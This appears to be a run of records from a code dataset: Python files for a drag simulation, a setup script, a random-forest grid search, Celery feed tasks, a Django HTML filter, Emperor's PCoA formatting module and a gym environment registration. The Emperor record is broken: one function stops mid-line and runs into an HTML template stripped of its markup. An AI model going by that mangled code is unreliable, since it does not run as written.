-9.81\nsurface_area = 5.78883e-5 #Surface area in meters^2\nrho = 1.225 #density of the air\ntheta = 2 #theta in degrees\nveloi = 951 #m/s\nvel = [veloi * cos(), veloi * sin()] #componentize the velocity at initial point\naccel =[0, 0] #x,y \n#vel = 5\nstep = .004\ndrag_c = .224\n#myfont = pygame.font.SysFont('Helvetica', 20)\ntoPrint = \"x = \" + str(x) + \" y = \" + str(y)\ndata_point = 0\nwhile(y >= 0):\n print(\"step: \" + str(data_point) + \" x: \" + str(x) + \" y: \" + str(y))\n print(\"pygame coords: \", to_pygame((x,y)))\n data_point += 1\n currDrag = [drag(vel[0], True), drag(vel[1], False)]\n accel = [acceleration(currDrag[0], False),\n acceleration(currDrag[1], True)]\n x = position(x, vel[0])\n y = position(y, vel[1])\n vel[0] = velocity(vel[0], accel[0])\n vel[1] = velocity(vel[1], accel[1])\n print(str(y))\n toPrint = \"x = \" + str(x) + \" y = \" + str(y)\n","sub_path":"troubleshoot.py","file_name":"troubleshoot.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"31238400","text":"import os\n\nfrom setuptools import setup, find_packages\n\nfrom pip.req import parse_requirements\n\nROOT = os.path.realpath(os.path.join(os.path.dirname(__file__)))\n__VERSION__ = '1.0.1'\n\nbase_requires = parse_requirements(os.path.join(ROOT, 'requirements', 'setup.txt'), session='hack')\nbase_requires = [str(item.req) for item in base_requires]\n\ntests_requires = parse_requirements(os.path.join(ROOT, 'requirements', 'development.txt'), session='hack')\ntests_requires = [str(item.req) for item in tests_requires]\n\nsetup(\n name=\"Django Distributed Exporter\",\n version=__VERSION__,\n author=\"Stored\",\n author_email=\"dev@stored.com.br\",\n url=\"https://github.com/stored/django-dde\",\n package_dir={'': 'src'},\n packages=find_packages('src'),\n description='Empiricus CRM',\n long_description=open(os.path.join(ROOT, 'README.md'), 'r', encoding='utf8').read(),\n install_requires=base_requires,\n setup_requires=base_requires,\n extras_require={\n 'tests': tests_requires,\n },\n zip_safe=True,\n include_package_data=True,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"557599289","text":"# -*- coding=utf-8 -*-\n\nprint('导入算法包...')\nimport time\nimport getpass\nimport pandas as pd\nimport sklearn\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\ntime_begin = time.time()\n\n\n# ---------------读取数据---------------------\nDATA_DIR = '../../data/data_4/'\nprint('读取数据...\\n位置:', DATA_DIR)\n\ntrain_df = pd.read_csv( DATA_DIR + 'train_preprocessed1.csv', encoding='gbk')\n\n# 使用特征选择的结果\nsupport = pd.read_csv(DATA_DIR + 'selection_result_rf.csv', encoding='gbk',\n header=None, names=['var', 'is_useful'])\npredictors = support[support['is_useful'] == True]['var'].values\ntarget = 'target'\ntrain_df = train_df[predictors].join(train_df[target])\n\nif getpass.getuser()=='stone':\n train_df=train_df[:2000]\n\nprint('数据量:', train_df.shape)\n# --------------END 读取数据------------------\n\n# ----------当前最优参数----------------\ndef get_tuned_rf():\n return RandomForestClassifier(\n n_estimators=400,\n max_features='sqrt',\n max_depth=19,\n min_samples_split=5,\n min_samples_leaf=18,\n random_state=36,\n n_jobs=-1)\n\nmodel = get_tuned_rf()\n\n# ---------------格点搜索----------------------\n# 格点搜索参数\nparam_test = {\n\n}\n\ngsearch = GridSearchCV(\n estimator=model,\n param_grid=param_test,\n scoring='roc_auc',\n iid=False,\n cv=5,\n n_jobs=-1,\n)\n\nprint('正在搜索...')\ngsearch.fit(train_df[predictors], train_df[target])\n\n# 输出搜索结果\nprint('\\n当前格点搜索的参数:\\n', param_test)\nprint('\\ngsearch.best_params_:', gsearch.best_params_,)\nprint('\\ngsearch.best_score_:', gsearch.best_score_, )\n\n# ---------------END 格点搜索----------------\n\ntime_spend = time.time() - time_begin\nprint('\\n运行时间:%d 秒,约%d分钟\\n' % (time_spend, time_spend // 60))\n","sub_path":"src/models_use_data_4/rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":1884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"92107292","text":"import datetime\nfrom celery.task import Task\nfrom utils import log as logging\nfrom django.conf import settings\n\nclass TaskFeeds(Task):\n name = 'task-feeds'\n\n def run(self, **kwargs):\n from apps.rss_feeds.models import Feed \n settings.LOG_TO_STREAM = True\n now = datetime.datetime.utcnow()\n \n # Active feeds\n feeds = Feed.objects.filter(\n next_scheduled_update__lte=now,\n active=True\n ).exclude(\n active_subscribers=0\n ).order_by('?')\n Feed.task_feeds(feeds)\n \n # Mistakenly inactive feeds\n day = now - datetime.timedelta(days=1)\n feeds = Feed.objects.filter(\n last_update__lte=day, \n queued_date__lte=day,\n min_to_decay__lte=60*24,\n active_subscribers__gte=1\n ).order_by('?')[:20]\n if feeds: Feed.task_feeds(feeds)\n \n week = now - datetime.timedelta(days=7)\n feeds = Feed.objects.filter(\n last_update__lte=week, \n queued_date__lte=day,\n active_subscribers__gte=1\n ).order_by('?')[:20]\n if feeds: Feed.task_feeds(feeds)\n\n \nclass UpdateFeeds(Task):\n name = 'update-feeds'\n max_retries = 0\n ignore_result = True\n\n def run(self, feed_pks, **kwargs):\n from apps.rss_feeds.models import Feed\n from apps.statistics.models import MStatistics\n \n mongodb_replication_lag = int(MStatistics.get('mongodb_replication_lag', 0))\n compute_scores = bool(mongodb_replication_lag < 60)\n \n options = {\n 'fake': bool(MStatistics.get('fake_fetch')),\n 'quick': float(MStatistics.get('quick_fetch', 0)),\n 'compute_scores': compute_scores,\n 'mongodb_replication_lag': mongodb_replication_lag,\n }\n \n if not isinstance(feed_pks, list):\n feed_pks = [feed_pks]\n \n for feed_pk in feed_pks:\n try:\n feed = Feed.objects.get(pk=feed_pk)\n feed.update(**options)\n except Feed.DoesNotExist:\n logging.info(\" ---> Feed doesn't exist: [%s]\" % feed_pk)\n # logging.debug(' Updating: [%s] %s' % (feed_pks, feed))\n\nclass NewFeeds(Task):\n name = 'new-feeds'\n max_retries = 0\n ignore_result = True\n\n def run(self, feed_pks, **kwargs):\n from apps.rss_feeds.models import Feed\n if not isinstance(feed_pks, list):\n feed_pks = [feed_pks]\n \n options = {\n 'force': True,\n }\n for feed_pk in feed_pks:\n feed = Feed.objects.get(pk=feed_pk)\n feed.update(options=options)\n\nclass PushFeeds(Task):\n name = 'push-feeds'\n max_retries = 0\n ignore_result = True\n\n def run(self, feed_id, xml, **kwargs):\n from apps.rss_feeds.models import Feed\n from apps.statistics.models import MStatistics\n \n mongodb_replication_lag = int(MStatistics.get('mongodb_replication_lag', 0))\n compute_scores = bool(mongodb_replication_lag < 60)\n \n options = {\n 'feed_xml': xml,\n 'compute_scores': compute_scores,\n 'mongodb_replication_lag': mongodb_replication_lag,\n }\n feed = Feed.objects.get(pk=feed_id)\n feed.update(options=options)\n","sub_path":"apps/rss_feeds/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"409996751","text":"from django import template\nfrom django.template import Context\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.template.loader import render_to_string, select_template\nimport django.dispatch\nfrom django.db.models import Model\n\nregister = template.Library()\ntemplate_chosen = django.dispatch.Signal(providing_args=[\"obj\", \"template\"])\ncontext_populated = django.dispatch.Signal(providing_args=[\"obj\", \"context\"])\n\nimport logging\nlogging.getLogger().setLevel(logging.DEBUG)\n\ndef _iterate_names(obj, names):\n \"\"\"\n Inspect an object for a value that might have multiple names.\n \"\"\"\n default_value = None\n for name in names:\n if hasattr(obj, name):\n return getattr(obj, name)\n return default_value\n\ndef _select_helper_template(obj, template_kind):\n \"\"\"\n Generate a list of possible template names, and then select the right one.\n \n The names it tries are:\n \n - [obj.template].html \n - [app_label]_[model]_[id]_[template_kind].html\n - [app_label]_[model]_[template_kind].html\n - [model]_[id]_[template_kind].html\n - [model]_[template_kind].html\n - [class]_[id]_[template_kind].html\n - [class]_[template_kind].html \n - [template_kind].html\n \"\"\"\n # 1.0 Determine the template\n template_names = []\n\n # Could be hard coded\n if hasattr(obj, 'template_name'):\n template_names.append(getattr(obj, 'template_name'))\n\n # Could be a django model\n if isinstance(obj, Model):\n content_type = ContentType.objects.get_for_model(obj)\n # [app_label]_[model]_[id]_[template_kind].html\n template_names.append(\"%s_%s_%s_%s.html\" % (content_type.app_label, content_type.model, obj.id, template_kind))\n # [app_label]_[model]_[template_kind].html\n template_names.append(\"%s_%s_%s.html\" % (content_type.app_label, content_type.model, template_kind))\n # [model]_[id]_[template_kind].html\n template_names.append(\"%s_%s_%s.html\" % (content_type.model, obj.id, template_kind))\n # [model]_[template_kind].html\n template_names.append(\"%s_%s.html\" % (content_type.model, template_kind))\n else: \n # By class and ID \n class_name = obj.__class__.__name__.lower()\n if hasattr(obj, 'id'):\n # [class]_[id]_[template_kind].html\n template_names.append('%s_%s_%s.html' % (class_name, getattr(obj, 'id'), template_kind))\n # [class]_[template_kind].html \n template_names.append(\"%s_%s.html\" % (class_name, template_kind))\n\n # Fallback template - [template_kind].html\n template_names.append('makehtml/%s.html' % template_kind)\n template = select_template(template_names)\n template_chosen.send(sender=None, obj=obj, template_chosen=template)\n return template\n\ndef _populate_context(obj, context):\n \"\"\"\n Populate the context with common elements\n \"\"\"\n context['title'] = _iterate_names(obj, ['title', 'name', 'headline'])\n context['body'] = _iterate_names(obj, ['body', 'content', 'text', 'note', 'description', 'long_description', 'message', 'question', 'choice'])\n context['summary'] = _iterate_names(obj, ['summary', 'excerpt', 'short_description']) \n context['first_name'] = _iterate_names(obj, ['first_name', 'firstname'])\n context['last_name'] = _iterate_names(obj, ['last_name', 'lastname'])\n context['sub_title'] = _iterate_names(obj, ['sub_title', 'subtitle'])\n context['author'] = _iterate_names(obj, ['author', 'creator'])\n context['email'] = _iterate_names(obj, ['email'])\n context['pub_date'] = _iterate_names(obj, ['pub_date', 'timestamp', 'publish_on', 'published_on', 'creation_date', 'date_added'])\n context['thumbnail'] = _iterate_names(obj, ['thumbnail', 'thumbnail_url'])\n context['mp3_url'] = _iterate_names(obj, ['mp3_url', 'podcast_url']) \n context['categories'] = _iterate_names(obj, ['categories', 'category', 'category_set'])\n context['is_public'] = _iterate_names(obj, ['is_public', 'published'])\n context['obj'] = obj\n # TODOs:\n # URLs\n # Event: start/stop\n return context\n\n@register.filter(name='html')\ndef html(value, htmltype='summary'):\n \"\"\"Introspect an object to create HTML.\"\"\"\n template = _select_helper_template(value, htmltype)\n context = _populate_context(value, Context())\n\n context_populated.send(sender=None, obj=value, context=context)\n logging.debug(\"Made HTML '%s'\" % htmltype)\n \n return template.render(context)\n \n","sub_path":"makehtml/templatetags/makehtml.py","file_name":"makehtml.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41926120","text":"#!/usr/bin/env python\n# File created on 24 Jan 2013\nfrom __future__ import division\n\n__author__ = \"Antonio Gonzalez Pena\"\n__copyright__ = \"Copyright 2013, The Emperor Project\"\n__credits__ = [\"Meg Pirrung\", \"Antonio Gonzalez Pena\", \"Yoshiki Vazquez Baeza\"]\n__license__ = \"BSD\"\n__version__ = \"0.9.51-dev\"\n__maintainer__ = \"Yoshiki Vazquez Baeza\"\n__email__ = \"yoshiki89@gmail.com\"\n__status__ = \"Development\"\n\n\nfrom sys import argv\nfrom copy import deepcopy\nfrom os.path import abspath\nfrom datetime import datetime\nfrom StringIO import StringIO\nfrom socket import gethostname\n\nfrom numpy import max, min, abs, argsort, array\n\nfrom emperor.util import (keep_columns_from_mapping_file,\n get_emperor_library_version)\n\nfrom emperor.qiime_backports.format import format_mapping_file\nfrom emperor.qiime_backports.parse import (mapping_file_to_dict,\n parse_mapping_file)\nfrom emperor.qiime_backports.filter import (\n filter_mapping_file_by_metadata_states,sample_ids_from_metadata_description)\nfrom emperor.qiime_backports.util import MetadataMap\nfrom emperor.qiime_backports import __version__ as qiime_backports_version\n\nclass EmperorLogicError(ValueError):\n \"\"\"Exception raised when a requirement for the Emperor GUI is not met\"\"\"\n pass\n\ndef format_pcoa_to_js(header, coords, eigvals, pct_var, custom_axes=[],\n coords_low=None, coords_high=None, number_of_axes=10,\n number_of_segments=8):\n \"\"\"Write the javascript necessary to represent a pcoa file in emperor\n\n Inputs:\n header: sample names for the pcoa file 1-D array\n coords: coordinates of the PCoA file, 2-D array\n eigvals: eigen-values of the PCoA file, 1-D array\n pct_var: percentage of variation of the PCoA file, 1-D array\n custom_axes: list of category names for the custom axes\n coords_low: coordinates representing the lower edges of an ellipse\n coords_high: coordinates representing the highere edges of an ellipse\n number_of_axes: number of axes to be returned\n number_of_segments: number of segments and rings for each sphere\n\n Output:\n string: javascript representation of the PCoA data inputed, contains a list\n of spheres, list of ellipses (if coords_low and coords_high are present) and\n several setup variables.\n\n Formats the output of qiime.parse.parse_coords_file into javascript variable\n declarations.\n \"\"\"\n js_pcoa_string = ''\n\n # validating that the number of coords in coords\n if number_of_axes>len(coords[0]):\n number_of_axes = len(coords[0])\n\n # validating that all the axes are above 0.01%, this accounts for really\n # small variations explained in some axes that end up being not practical\n # as the GUI has some problems when presenting those values on screen\n valid_pcoalabels = len([i for i in pct_var if i>0.01])\n if number_of_axes>valid_pcoalabels:\n number_of_axes = valid_pcoalabels\n if number_of_axes < 3:\n raise EmperorLogicError(\"Due to the variation explained, Emperor \"\n \"could not plot at least 3 axes, check the \"\n \"input files to ensure that the percent \"\n \"explained is greater than 0.01 in at least \"\n \"three axes.\")\n\n # ranges for the PCoA space\n max_x = max(coords[:,0:1])\n max_y = max(coords[:,1:2])\n max_z = max(coords[:,2:3])\n min_x = min(coords[:,0:1])\n min_y = min(coords[:,1:2])\n min_z = min(coords[:,2:3])\n maximum = max(abs(coords[:,:number_of_axes]))\n pcoalabels = pct_var[:number_of_axes]\n\n radius = (max_x-min_x)*.012\n\n # write the values for all the spheres\n js_pcoa_string += '\\nvar g_spherePositions = new Array();\\n'\n for point, coord in zip(header, coords):\n all_coords = ', '.join([\"'P%d': %f\" % (i+1,coord[i]) for i in range(number_of_axes)])\n js_pcoa_string += (\"g_spherePositions['%s'] = { 'name': '%s', 'color': \"\n \"0, 'x': %f, 'y': %f, 'z': %f, %s };\\n\" % (point, point, coord[0],\n coord[1],coord[2], all_coords))\n\n # write the values for all the ellipses\n js_pcoa_string += '\\nvar g_ellipsesDimensions = new Array();\\n'\n if coords_low is not None and coords_high is not None:\n for s_header, s_coord, s_low, s_high in zip(header, coords, coords_low,\n coords_high):\n delta = abs(s_high-s_low)\n all_coords = ', '.join([\"'P%d': %f\" % (i+1,s_coord[i]) for i in range(number_of_axes)])\n js_pcoa_string += (\"g_ellipsesDimensions['%s'] = { 'name': '%s', \"\n \"'color': 0, 'width': %f, 'height': %f, 'length': %f , 'x': %f,\"\n \" 'y': %f, 'z': %f, %s }\\n\" % (s_header, s_header,delta[0], delta[1],\n delta[2], s_coord[0], s_coord[1], s_coord[2], all_coords))\n\n js_pcoa_string += 'var g_segments = %d, g_rings = %d, g_radius = %f;\\n' % (number_of_segments,\n number_of_segments, radius)\n js_pcoa_string += 'var g_xAxisLength = %f;\\n' % (abs(max_x)+abs(min_x))\n js_pcoa_string += 'var g_yAxisLength = %f;\\n' % (abs(max_y)+abs(min_y))\n js_pcoa_string += 'var g_zAxisLength = %f;\\n' % (abs(max_z)+abs(min_z))\n js_pcoa_string += 'var g_xMaximumValue = %f;\\n' % (max_x)\n js_pcoa_string += 'var g_yMaximumValue = %f;\\n' % (max_y)\n js_pcoa_string += 'var g_zMaximumValue = %f;\\n' % (max_z)\n js_pcoa_string += 'var g_xMinimumValue = %f;\\n' % (min_x)\n js_pcoa_string += 'var g_yMinimumValue = %f;\\n' % (min_y)\n js_pcoa_string += 'var g_zMinimumValue = %f;\\n' % (min_z)\n js_pcoa_string += 'var g_maximum = %f;\\n' % maximum\n\n offset = 0\n\n # create three vars, pc1, pc2 and pc3 if no custom_axes are passed, then use\n # the values of the percent explained by the PCoA; if custom_axes are passed\n # use as many as you can (since customs axes can be either [0, 1, 2, 3])\n for i in range(0, 3):\n try:\n js_pcoa_string += 'var g_pc%dLabel = \\\"%s\\\";\\n' % (i+1,\n custom_axes[i])\n offset+=1 # offset will help us retrieve the correct pcoalabels val\n except:\n # if there are custom axes then subtract the number of custom axes\n js_pcoa_string += 'var g_pc%dLabel = \\\"PC%d (%.2f %%)\\\";\\n' %\\\n (i+1, i+1-offset, pcoalabels[i-offset])\n js_pcoa_string += 'var g_number_of_custom_axes = %d;\\n' % offset\n\n js_pcts = []\n js_pcts_round = []\n if custom_axes == None: custom_axes = []\n for element in custom_axes + list(pct_var[:number_of_axes]):\n try:\n # scale the percent so it's a number from 0 to 1\n js_pcts.append('%f' % (float(element)/100))\n js_pcts_round.append('%.2f' % (element))\n except ValueError:\n js_pcts.append('%f' % (float(pct_var[0]/100)))\n js_pcts_round.append('%.2f' % (pct_var[0]))\n js_pcoa_string += 'var g_fractionExplained = [%s];\\n' % ', '.join(js_pcts)\n js_pcoa_string += 'var g_fractionExplainedRounded = [%s];\\n' % ', '.join(js_pcts_round)\n\n return js_pcoa_string\n\ndef format_mapping_file_to_js(mapping_file_data, mapping_file_headers, columns):\n \"\"\"Write a javascript representation of the mapping file\n\n Inputs:\n mapping_file_data: contents of the mapping file\n mapping_file_headers: headers of the mapping file\n columns: valid columns to use, usually a subset of mapping_file_headers\n\n Outputs:\n string: javascript representation of the mapping file\n \"\"\"\n js_mapping_file_string = ''\n\n mapping_file_dict = mapping_file_to_dict(mapping_file_data,\n mapping_file_headers)\n\n map_values = []\n for k,v in mapping_file_dict.items():\n if 'SampleID' in columns:\n vals = [\"'%s'\" % k] + [\"'%s'\" % v[col]\\\n for col in mapping_file_headers[1:]]\n else:\n vals = [\"'%s'\" % v[col] for col in mapping_file_headers[1:]]\n map_values.append(\"'%s': [%s]\" % (k, ','.join(vals)))\n\n if 'SampleID' not in columns:\n mapping_file_headers = mapping_file_headers[1:]\n\n # format the mapping file as javascript objects\n js_mapping_file_string += 'var g_mappingFileHeaders = [%s];\\n' % ','.join(\n [\"'%s'\" % col for col in mapping_file_headers])\n js_mapping_file_string += 'var g_mappingFileData = { %s };\\n' % ','.join(\n map_values)\n\n map_object = MetadataMap(mapping_file_dict, [])\n # make sure the comparison for SampleID is made first because otherwise\n # if the metadata map tries to check 'SampleID' it will raise an exception\n animatable_categories = [category for category in columns\\\n if category != 'SampleID' and map_object.isNumericCategory(category)]\n js_mapping_file_string += 'var g_animatableMappingFileHeaders = [%s];\\n' %\\\n ','.join([\"'%s'\" % col for col in animatable_categories])\n\n return js_mapping_file_string\n\ndef format_taxa_to_js(otu_coords, lineages, prevalence, min_taxon_radius=0.5,\n max_taxon_radius=5, radius=1.0):\n \"\"\"Write a string representing the taxa in a PCoA plot as javascript\n\n Inputs:\n otu_coords: numpy array where the taxa is positioned\n lineages: label for each of these lineages\n prevalence: score of prevalence for each of the taxa that is drawn\n\n *These parameters should work more as constants and once we find out that\n there's a value that is too big to be presented, the proper checks should\n be put into place. Currently we haven't found such cases in any study*\n min_taxon_radius: minimum value for the radius of the spheres on the plot\n max_taxon_radious: maximum value for the radius of the spheres on the plot\n radius: default value size\n\n Outputs:\n js_biplots_string: javascript string where the taxa information is written\n to create the spheres representing each of these, will return only the\n variable declaration if the inputs are empty.\n \"\"\"\n js_biplots_string = []\n js_biplots_string.append('\\nvar g_taxaPositions = new Array();\\n')\n\n # if we have prevalence scores, calculate the taxa radii values\n if len(prevalence):\n taxa_radii = radius*(min_taxon_radius+(max_taxon_radius-\n min_taxon_radius)*prevalence)\n else:\n taxa_radii = []\n\n index = 0\n\n # write the data in the form of a dictionary\n for taxa_label, taxa_coord, t_radius in zip(lineages,otu_coords,taxa_radii):\n js_biplots_string.append((\"g_taxaPositions['%d'] = { 'lineage': '%s', \"\n \"'x': %f, 'y': %f, 'z': %f, 'radius': %f};\\n\") % (index,\n taxa_label, taxa_coord[0], taxa_coord[1], taxa_coord[2], t_radius))\n index += 1\n js_biplots_string.append('\\n')\n # join the array of strings as a single string\n return ''.join(js_biplots_string)\n\ndef format_vectors_to_js(mapping_file_data, mapping_file_headers, coords_data,\n coords_headers, connected_by_header,\n sorted_by_header=None):\n \"\"\"Write a string representing the vectors in a PCoA plot as javascript\n\n Inputs:\n mapping_file_data: contents of the mapping file\n mapping_file_headers: headers of the mapping file\n coords_data: coordinates of the PCoA plot in a numpy 2-D array or a list of\n numpy 2-D arrays for jackknifed input\n coords_headers: headers of the coords in the PCoA plot or a list of lists\n with the headers for jackknifed input\n connected_by_header: header of the mapping file that represents how the\n lines will be connected\n sorted_by_header: numeric-only header name to sort the samples in the\n vectors\n\n Output:\n js_vectors_string: string that represents the vectors in the shape of a\n javascript object\n\n Notes:\n If using jackknifed input, the coordinates and headers that will be used are\n the ones belonging to the master coords i. e. the first element.\n \"\"\"\n\n js_vectors_string = []\n js_vectors_string.append('\\nvar g_vectorPositions = new Array();\\n')\n\n if connected_by_header != None:\n # check if we are processing jackknifed input, if so just get the master\n if type(coords_data) == list:\n coords_data = coords_data[0]\n coords_headers = coords_headers[0]\n\n columns_to_keep = ['SampleID', connected_by_header]\n\n # do not ad None if sorted_by_header is None or empty\n if sorted_by_header:\n columns_to_keep.append(sorted_by_header)\n\n # reduce the amount of data by keeping the required fields only\n mapping_file_data, mapping_file_headers =\\\n keep_columns_from_mapping_file(mapping_file_data,\n mapping_file_headers, columns_to_keep)\n\n # format the mapping file to use this with the filtering function\n mf_string = format_mapping_file(mapping_file_headers, mapping_file_data)\n\n index = mapping_file_headers.index(connected_by_header)\n connected_by = list(set([line[index] for line in mapping_file_data]))\n\n for category in connected_by:\n # convert to StringIO to for each iteration; else the object\n # won't be usable after the first iteration & you'll get an error\n sample_ids = sample_ids_from_metadata_description(\n StringIO(mf_string),'%s:%s' % (connected_by_header,category))\n\n # if there is a sorting header, sort the coords using these values\n if sorted_by_header:\n sorting_index = mapping_file_headers.index(sorted_by_header)\n to_sort = [line for line in mapping_file_data if line[0] in\\\n sample_ids]\n\n # get the sorted sample ids from the sorted-reduced mapping file\n sample_ids = zip(*sorted(to_sort,\n key=lambda x: float(x[sorting_index])))[0]\n\n # each category value is a new vector\n js_vectors_string.append(\"g_vectorPositions['%s'] = new Array();\\n\"\n % (category))\n\n for s in sample_ids:\n index = coords_headers.index(s)\n\n # print the first three elements of each coord for each sample\n js_vectors_string.append(\"g_vectorPositions['%s']['%s'] = %s;\\n\"\n % (category, s, coords_data[index, :3].tolist()))\n\n return ''.join(js_vectors_string)\n\ndef format_comparison_bars_to_js(coords_data, coords_headers, clones,\n is_serial_comparison=True):\n \"\"\"Format coordinates data to create a comparison plot\n\n Inputs:\n coords_data: numpy array with the replicated coordinates\n cooreds_headers: list with the headers for each of replicated coordinates\n clones: number of replicates in the coords_data and coords_headers\n is_serial_comparison: whether the samples will be connected one after the\n other (True) or all will originate in the first set of coordinates.\n\n Outputs:\n Javascript object that contains the data for the comparison plot\n\n Raises:\n AssertionError if the coords_data and coords_headers don't have the same\n length.\n AssertionError if the number of clones doesn't concord with the samples\n being presented.\n\n Unless the value of clones is > 0 this function will return an empty\n javascript object initialization.\n \"\"\"\n\n js_comparison_string = []\n js_comparison_string.append('\\nvar g_comparisonPositions = new Array();\\n')\n\n if is_serial_comparison:\n js_comparison_string.append('var g_isSerialComparisonPlot = true;\\n')\n else:\n js_comparison_string.append('var g_isSerialComparisonPlot = false;\\n')\n\n if clones:\n headers_length = len(coords_headers)\n\n # assert some sanity checks\n assert headers_length == len(coords_data), \"The coords data and\"+\\\n \"the coords headers must have the same length\"\n assert headers_length%clones == 0, \"There has to be an exact \"+\\\n \"number of clones of the data\"\n\n # get the indices that the sample names get sorted by, this will group\n # all the samples with the same prefix together, and since the suffixes\n # are numeric, the samples will be one after the other i. e. sample_0,\n # sample_1, sample_2 and other_0, other_1, other_2 and so on. With these\n # indices sort the coordinates and then the headers themselves, though\n # convert to a numpy array first & back to a list to avoid sorting again\n indices = argsort(coords_headers)\n coords_data = coords_data[indices, :]\n coords_headers = array(coords_headers)[indices].tolist()\n\n # in steps of the number of clones iterate through the headers and the\n # coords to create the javascript object with the coordinates\n for index in xrange(0, headers_length, clones):\n # 1st object must have _0 as a suffix, trim it reveal the sample id\n assert coords_headers[index].endswith('_0'), \"There's an internal\"+\\\n \" inconsistency with the sample ids\"\n sample_id = coords_headers[index][:-2]\n\n # convert all elements in the numpy array into a string before\n # formatting the elements into the javascript dictionary object\n js_comparison_string.append(\"g_comparisonPositions['%s'] = [%s];\\n\"%\n (sample_id, str(', '.join(map(str,\n coords_data[index:(index+clones), 0:3].tolist())))))\n return ''.join(js_comparison_string)\n\n\ndef format_emperor_html_footer_string(has_biplots=False, has_ellipses=False,\n has_vectors=False, has_edges=False):\n \"\"\"Create an HTML footer according to the things being presented in the plot\n\n has_biplots: whether the plot has biplots or not\n has_ellipses: whether the plot has ellipses or not\n has_vectors: whether the plot has vectors or not\n has_edges: whether the plot has edges between samples (comparison plot)\n\n\n This function will remove unnecessary GUI elements from index.html to avoid\n confusions i. e. showing an ellipse opacity slider when there are no\n ellipses in the plot.\n \"\"\"\n optional_strings = []\n\n # we use python's built-in ternary operator to add or not a string\n # see _EMPEROR_FOOTER_HTML_STRING\n format_dict = {'biplot_spheres_color_selector':\n _BIPLOT_SPHERES_COLOR_SELECTOR if has_biplots else '',\n 'biplot_visibility_selector':\n _BIPLOT_VISIBILITY_SELECTOR if has_biplots else '',\n 'taxa_labels_selector':\n _TAXA_LABELS_SELECTOR if has_biplots else '',\n 'taxa_labels_color_selector':\n _TAXA_LABELS_COLOR_SELECTOR if has_biplots else '',\n 'edges_color_selector':\n _EDGES_COLOR_SELECTOR if has_edges else '',\n 'ellipse_opacity_slider':\n _ELLIPSE_OPACITY_SLIDER if has_ellipses else '',\n 'vectors_opacity_slider':\n _VECTORS_OPACITY_SLIDER if has_vectors else '',\n 'edges_visibility_selector':\n _EDGES_VISIBILITY_SELECTOR if has_edges else ''}\n\n return _EMPEROR_FOOTER_HTML_STRING.format(**format_dict)\n\ndef format_emperor_autograph(metadata_fp, coords_fp, language='HTML'):\n \"\"\"Create a signature with some meta-data of the Emperor package\n\n language: language to which it will be formatted as a multi-line comment\n\n \"\"\"\n\n # supported open and closing of multi-line comments for different languages\n _languages = {'HTML':(''), 'Python':('\"\"\"', '\"\"\"'), 'C':('/*',\n '*/'), 'Bash':('<\n\n\n\n Emperor\n \n \n \n\n \n \n \n \n \n \n \n\n \n \n \n
\"Emperor\"
\n\n \n\n \n \n \n \n \n \n\n \n \n \n\n \n \n \n \n \n \n \n\n \n \n \n \n\n \n \n \n \n \n \n \n \n\n\n\n\n
\n\n
\n
\n
\n \n \n
\n
\n
\n
\n \n\n
\n
\n\n
\n
\n\n
\n
\n\n
\n
\n\n
\n
\n
\n\n
\n
\n\n
\n\n
\n
\n \n
\n
\n \n
\n
\n
\n
\n
\n {biplot_spheres_color_selector}\n

\n \n
\n
\n
\n
{biplot_visibility_selector}\n \n \n \n \n \n \n \n \n \n \n \n \n \n
\n \n
\n
\n
\n
\n
\n
\n \n \n
\n
\n \n
\n
\n
\n \n \n \n \n \n \n \n \n \n \n
\n \n
\n
\n
\n
\n
\n
\n \n \n
\n
\n
\n
\n
\n
\n Samples Label Visibility\n
{taxa_labels_selector}\n
\n \n \n
\n
\n \n {taxa_labels_color_selector}\n

\n
\n
\n
\n \n
\n
\n
\n
\n
\n
\n
\n
\n
\n
\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n \n \n \n \n \n \n \n \n \n
\n \n \n \n
\n \n \n
\n
\n
\n

\n
\n
\n
\n \n
\n \n
\n
\n
\n
\n \n \n \n {edges_color_selector}\n \n
Axes Labels Color
Axes Color
Background Color
\n
{ellipse_opacity_slider}{vectors_opacity_slider}{edges_visibility_selector}\n
\n
\n
\n
\n Scale coords by percent explained\n
\n
\n
\n

\n
\n
Filename (only letters, numbers, ., - and _):\n
\n
Create legend\n \n

For a PNG, simply press 'ctrl+p'.\n
\n
\n
\n
\n
\n
\n
\n
\n\n\n\n\"\"\"\n","sub_path":"emperor/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":38863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"638528669","text":"import gym\nfrom gym.envs.registration import register\n\n\ndef make(\n domain_name,\n task_name,\n resource_files,\n img_source,\n total_frames,\n seed=1,\n visualize_reward=True,\n from_pixels=False,\n height=84,\n width=84,\n camera_id=0,\n frame_skip=1,\n episode_length=1000,\n frame_stack=1,\n environment_kwargs=None,\n extra='train',\n):\n env_id = 'dmc_%s_%s_%s_%s_-v1' % (domain_name, task_name, extra, seed)\n\n if from_pixels:\n assert not visualize_reward,\\\n 'cannot use visualize reward when learning from pixels'\n\n # shorten episode length\n max_episode_steps = (episode_length + frame_skip - 1) // frame_skip\n\n if env_id not in gym.envs.registry.env_specs:\n register(\n id=env_id,\n entry_point='noisy_bg.envs.dmc2gym.wrappers:DMCWrapper',\n kwargs={\n 'domain_name': domain_name,\n 'task_name': task_name,\n 'resource_files': resource_files,\n 'img_source': img_source,\n 'total_frames': total_frames,\n 'task_kwargs': {\n 'random': seed\n },\n 'environment_kwargs': environment_kwargs,\n 'visualize_reward': visualize_reward,\n 'from_pixels': from_pixels,\n 'height': height,\n 'width': width,\n 